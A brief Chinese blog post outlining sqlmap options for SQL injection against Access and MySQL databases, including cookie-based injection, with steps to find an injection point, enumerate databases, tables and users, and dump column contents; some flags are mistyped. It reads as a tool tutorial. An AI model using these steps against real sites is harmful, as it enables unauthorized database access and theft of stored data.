利用sqlmap进行Access和Mysql注入

一名锦绣 2020-04-05 我要评论

sqlmap将检测结果保存到C:\Users\Administrator\.sqlmap\output (windows) linux:(/root/.sqlmap/output) Access注入 1.检测是否存在注入点 2.--tables 检测表名 3.--columns -T “表名”检测那个表中的字段 4.--dump -C "字段名" -T ”表名“ 检测那个表中那个字段中的内容 mysql注入 1.检测是否存在注入点 2.--dbs 当前所有数据库 3.--current -db 当前正在使用的数据库 4.--current -user 检测当前用户 5.--version 检测版本信息 6.--is-dba 检测当前用户是否为数据库管理员 7.以后步骤依照Access注入，-D 指定数据库 Cookie注入 1.检测注入点 --cookie "id=16"--level 2 level 最多5级 risk 最多三级 level 指定探测等级 level 1，探测GTE,POST level 2 探测Cookie数据 2.--cookie “id=16”--level 2 --tables 检测表名 3.--cookie “id=16”--level 2 --columns -T "表名“ 检测那个表中的字段名 4.--cookie “id=16”--level 2 --dump -C ”那个字段“ -T "表名“ 检测那个表中那个字段中的内容【本人不保证技术的实用性，一切文章仅供参考，如有谬错，请留言】

Docker搭建MySQL主从复制

利用sqlmap进行Access和Mysql注入

相关文章

猜您喜欢

今日热门